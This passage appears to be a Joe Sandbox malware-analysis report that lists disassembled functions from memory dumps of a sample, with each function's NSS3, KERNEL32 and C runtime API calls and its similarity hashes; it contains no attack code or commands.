Part of subcall function 6C6514C0: EnterCriticalSection.KERNEL32 ref: 6C6514F5
Part of subcall function 6C6514C0: PR_Unlock.NSS3 ref: 6C65150D

Part of subcall function 6C65CEE0: PORT_ArenaMark_Util.NSS3(?,6C65CD93,?), ref: 6C65CEEE
Part of subcall function 6C65CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C65CD93,?), ref: 6C65CEFC
Part of subcall function 6C65CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C65CD93,?), ref: 6C65CF0B
Part of subcall function 6C65CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C65CD93,?), ref: 6C65CF1D

Part of subcall function 6C65CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C65CD93,?), ref: 6C65CF47
Part of subcall function 6C65CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C65CD93,?), ref: 6C65CF67
Part of subcall function 6C65CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C65CD93,?,?,?,?,?,?,?,?,?,?,?,6C65CD93,?), ref: 6C65CF78

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 6583a16c68b691c1564c423793ca22462adb1c5fb899bdf0018e67af1b46ad77
Instruction ID: fb0adba0d6e01c74a2f96acbdadf11c0da72f3dea18389ad3b3ce9a12bad60bd
Opcode Fuzzy Hash: 6583a16c68b691c1564c423793ca22462adb1c5fb899bdf0018e67af1b46ad77
Instruction Fuzzy Hash: DC51E3B6B00204AFEB10DF69CC40BAA77F4AF4D348F740524D806A7740EB31E926CB99

Function 6C62EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C62EF38

Part of subcall function 6C619520: PK11_IsLoggedIn.NSS3(00000000,?,6C64379E,?,00000001,?), ref: 6C619542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C62EF53

Part of subcall function 6C634C20: TlsGetValue.KERNEL32 ref: 6C634C4C
Part of subcall function 6C634C20: EnterCriticalSection.KERNEL32(?), ref: 6C634C60
Part of subcall function 6C634C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C634CA1
Part of subcall function 6C634C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C634CBE
Part of subcall function 6C634C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C634CD2
Part of subcall function 6C634C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C634D3A

PR_GetCurrentThread.NSS3 ref: 6C62EF9E

Part of subcall function 6C6B9BF0: TlsGetValue.KERNEL32(?,?,?,6C700A75), ref: 6C6B9C07

free.MOZGLUE(00000000), ref: 6C62EFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C62F016
free.MOZGLUE(00000000), ref: 6C62F022

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: b1fa93f50f671d0534a3f63afdc68127029ac06f7d54f1703d7340a174b107a6
Instruction ID: 2154fe3e8ab393b89b436b40d98ad7329728be4e3cb2ec6b7792bd798282c321
Opcode Fuzzy Hash: b1fa93f50f671d0534a3f63afdc68127029ac06f7d54f1703d7340a174b107a6
Instruction Fuzzy Hash: 6C41B371E00209AFDF018FA9DC44BEEBBB9AF49358F004035F914A6750E776C9158FA9

Function 6C604860 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C604894

Part of subcall function 6C64B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7218D0,?), ref: 6C64B095

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6048CA
SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6048DD
SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C6048FF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C604912
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C60494A

Part of subcall function 6C69C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C69C2BF

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
String ID:
API String ID: 759476665-0
Opcode ID: e436c567eb87a29b82afdf83b64223e81f8ead1a8b6b11bf85bcc2e180198261
Instruction ID: 39221cbd5bf004ee9e6ef338ce79fec015a7c1939745c3b82c1005ebca293532
Opcode Fuzzy Hash: e436c567eb87a29b82afdf83b64223e81f8ead1a8b6b11bf85bcc2e180198261
Instruction Fuzzy Hash: 8241D270704705ABE718CE69C980BAB73E8AF95358F00493CEA55A7B41F7B0D904CB5A

Function 6C61CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6C61CF80
SECITEM_DupItem_Util.NSS3(?), ref: 6C61D002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C61D016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C61D025
PR_NewLock.NSS3 ref: 6C61D043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C61D074

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: 9952a4a8ba199f6ba86cba105f81505b20e4a3e08d64336c2a713171c845615a
Instruction ID: fc1401bf26070c3f00e378782ec65d30c6e1f9dacb8f47f7ec1140eb3e121de6
Opcode Fuzzy Hash: 9952a4a8ba199f6ba86cba105f81505b20e4a3e08d64336c2a713171c845615a
Instruction Fuzzy Hash: 2A41C1B0A09311AFDB11DF2DC88479A7BE4EF0935AF10816ADC198BF46D770D485CBA9

Function 6C602E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C5F2D1A), ref: 6C602E7E

Part of subcall function 6C6507B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C5F8298,?,?,?,6C5EFCE5,?), ref: 6C6507BF
Part of subcall function 6C6507B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6507E6
Part of subcall function 6C6507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C65081B
Part of subcall function 6C6507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C650825

PR_Now.NSS3 ref: 6C602EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C602EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C5F2D1A), ref: 6C602F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C5F2D1A), ref: 6C602F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C602F81

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: 110f754fd1a16036792a415ff7770237be7405fb0f59bab8d145f537c02797d4
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: B13145707411008BF718C615CE48BAE7365EF81398F64497AD529B7AD0EB30984ACA1A

Function 6C5F0E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C5F0A2C), ref: 6C5F0E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C5F0A2C), ref: 6C5F0E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C5F0A2C), ref: 6C5F0E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C5F0A2C), ref: 6C5F0E90
free.MOZGLUE(00000000), ref: 6C5F0EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C5F0A2C), ref: 6C5F0ED9

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 5a81b2ab8d714043cf4d2f07cdb272540b4a0f40eb888a55de461ca8677a034f
Instruction ID: d6c6dde8bcb6142e3de1a4e209817cfdbece7c947cd1a20bc2a78a898103857d
Opcode Fuzzy Hash: 5a81b2ab8d714043cf4d2f07cdb272540b4a0f40eb888a55de461ca8677a034f
Instruction Fuzzy Hash: E8213176F0128557EB0485665C45B6772AEDBC174CF1D4437DB3893705EA60C8178AA1

Function 00EF93C0 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00EF93CE

Part of subcall function 00EF8E61: __mtinitlocknum.LIBCMT ref: 00EF8E77
Part of subcall function 00EF8E61: __amsg_exit.LIBCMT ref: 00EF8E83
Part of subcall function 00EF8E61: EnterCriticalSection.KERNEL32(00000000,00000000,?,00EF9269,0000000D,?,?,00EF8BEF,00EF8A8D,?,?,00EF8978,00000000,00F02C38,00EF89BF), ref: 00EF8E8B

DecodePointer.KERNEL32(00F02B40,00000020,00EF9511,00000000,00000001,00000000,?,00EF9533,000000FF,?,00EF8E88,00000011,00000000,?,00EF9269,0000000D), ref: 00EF940A
DecodePointer.KERNEL32(?,00EF9533,000000FF,?,00EF8E88,00000011,00000000,?,00EF9269,0000000D,?,?,00EF8BEF,00EF8A8D), ref: 00EF941B

Part of subcall function 00EF91E2: EncodePointer.KERNEL32(00000000,00EFA9D2,00F04DC8,00000314,00000000,?,?,?,?,?,00EF9728,00F04DC8,Microsoft Visual C++ Runtime Library,00012010), ref: 00EF91E4

DecodePointer.KERNEL32(-00000004,?,00EF9533,000000FF,?,00EF8E88,00000011,00000000,?,00EF9269,0000000D,?,?,00EF8BEF,00EF8A8D), ref: 00EF9441
DecodePointer.KERNEL32(?,00EF9533,000000FF,?,00EF8E88,00000011,00000000,?,00EF9269,0000000D,?,?,00EF8BEF,00EF8A8D), ref: 00EF9454
DecodePointer.KERNEL32(?,00EF9533,000000FF,?,00EF8E88,00000011,00000000,?,00EF9269,0000000D,?,?,00EF8BEF,00EF8A8D), ref: 00EF945E

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: ccc45b0a0b50ffd8374a4f37f45510034cf8b7b7058fb34a28a6f5a6d4b453b7
Instruction ID: 09263e2779d21039a010ac34e9fb589fc22db6306ce396ba99d91f8ff707d427
Opcode Fuzzy Hash: ccc45b0a0b50ffd8374a4f37f45510034cf8b7b7058fb34a28a6f5a6d4b453b7
Instruction Fuzzy Hash: 8A314E70A0034DDFDF10AFA5D9857ECB6F0BF58314F10606AD2A0B6292CBB54986DF65

Function 6C5FAE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C5FAEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C5FAECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5FAEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C5FAF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C719500), ref: 6C5FAF23

Part of subcall function 6C64F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C64F0C8
Part of subcall function 6C64F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C64F122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5FAF37

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: ebb82fb63ce4bdfad72dc6c337142438c29c83b519b6325b48581f215bb8002d
Instruction ID: bc0d2813e4ef9756541dc3a49e3bb2b172bec4428ccd87b5464eb10eb8f821a7
Opcode Fuzzy Hash: ebb82fb63ce4bdfad72dc6c337142438c29c83b519b6325b48581f215bb8002d
Instruction Fuzzy Hash: D3212875909200ABE7108E188C41B9A7BA4AF8573CF144315EC249F7D1E731D5068BAB

Function 6C67EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C67EE85
realloc.MOZGLUE(6DA3F8D5,?), ref: 6C67EEAE
PORT_Alloc_Util.NSS3(?), ref: 6C67EEC5

Part of subcall function 6C650BE0: malloc.MOZGLUE(6C648D2D,?,00000000,?), ref: 6C650BF8
Part of subcall function 6C650BE0: TlsGetValue.KERNEL32(6C648D2D,?,00000000,?), ref: 6C650C15

htonl.WSOCK32(?), ref: 6C67EEE3
htonl.WSOCK32(00000000,?), ref: 6C67EEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C67EF01

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: f9419988c4c902cfec2b487a6d468fe12a4a5fee7101efb6bc41da1c2be2ab97
Instruction ID: f6cbd7f64f9091180235848f5f47e963051256ca1c789085315b220dc20e81c9
Opcode Fuzzy Hash: f9419988c4c902cfec2b487a6d468fe12a4a5fee7101efb6bc41da1c2be2ab97
Instruction Fuzzy Hash: 9E21E571A002149FCB20DF28DC84B9AB7A4EF45358F158979EC199B651E330EC19CBFA

Function 6C62EE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C62EE49

Part of subcall function 6C64FAB0: free.MOZGLUE(?,-00000001,?,?,6C5EF673,00000000,00000000), ref: 6C64FAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C62EE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C62EE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C62EE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C62EEB3

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: b7fa0b991d501db0e4c5864fc3702a3320de8457e430e969f1c29bb8297a0222
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: E121D8B6A002106BEB118E28DC81EAB77A8EF46719F084174FE049B741E771DC158BF9

Function 6C644820 Relevance: 9.1, APIs: 6, Instructions: 74stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C644EB8,?), ref: 6C644884

Part of subcall function 6C648800: TlsGetValue.KERNEL32(?,6C65085A,00000000,?,6C5F8369,?), ref: 6C648821
Part of subcall function 6C648800: TlsGetValue.KERNEL32(?,?,6C65085A,00000000,?,6C5F8369,?), ref: 6C64883D
Part of subcall function 6C648800: EnterCriticalSection.KERNEL32(?,?,?,6C65085A,00000000,?,6C5F8369,?), ref: 6C648856
Part of subcall function 6C648800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C648887
Part of subcall function 6C648800: PR_Unlock.NSS3(?,?,?,?,6C65085A,00000000,?,6C5F8369,?), ref: 6C648899

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C644EB8,?,?,?,?,?,?,?,?,?,?,6C6078F8), ref: 6C64484C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C644EB8,?,?,?,?,?,?,?,?,?,?,6C6078F8), ref: 6C64486D
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C6078F8), ref: 6C644899
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6448A9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6448B8

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockstrcmp$CondErrorWait
String ID:
API String ID: 2226052791-0
Opcode ID: a9bf8a246cd28c19ffce1a2d75b08b67eb0fb2c327a38a4164130c2e93cd0277
Instruction ID: 82371a9e6c88de6c21847ccc31452d626416d44b247759ba8c9d5c13af9e3551
Opcode Fuzzy Hash: a9bf8a246cd28c19ffce1a2d75b08b67eb0fb2c327a38a4164130c2e93cd0277
Instruction Fuzzy Hash: E721F6B2F002409FEF006EA5DC8697677B8EF0A359704C539DE4987A12EB61E818C7E5

Function 6C5DC4E0 Relevance: 9.1, APIs: 6, Instructions: 52COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5DC4F0
free.MOZGLUE ref: 6C5DC51A
TlsSetValue.KERNEL32 ref: 6C5DC540
free.MOZGLUE ref: 6C5DC557
DeleteCriticalSection.KERNEL32 ref: 6C5DC56A
free.MOZGLUE ref: 6C5DC576

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: free$Value$CriticalDeleteSection
String ID:
API String ID: 195087141-0
Opcode ID: 412fa818130cbb0e8aaa55f8a5226c9deb97ee970bec630ab299788bf12c6139
Instruction ID: 167597a0fe2649a45d1d9b43124c301ff30cf3df78d73a18ad0e0884afbaaf67
Opcode Fuzzy Hash: 412fa818130cbb0e8aaa55f8a5226c9deb97ee970bec630ab299788bf12c6139
Instruction Fuzzy Hash: DD110A74A04B008BCB10BF7DC44815ABBF4BF46649F054E6DD8C687601EB30A498CB86

Function 00EFA063 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00EFA06F

Part of subcall function 00EF934C: __getptd_noexit.LIBCMT ref: 00EF934F
Part of subcall function 00EF934C: __amsg_exit.LIBCMT ref: 00EF935C

__amsg_exit.LIBCMT ref: 00EFA08F
__lock.LIBCMT ref: 00EFA09F
InterlockedDecrement.KERNEL32(?), ref: 00EFA0BC
_free.LIBCMT ref: 00EFA0CF
InterlockedIncrement.KERNEL32(00F04530), ref: 00EFA0E7

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
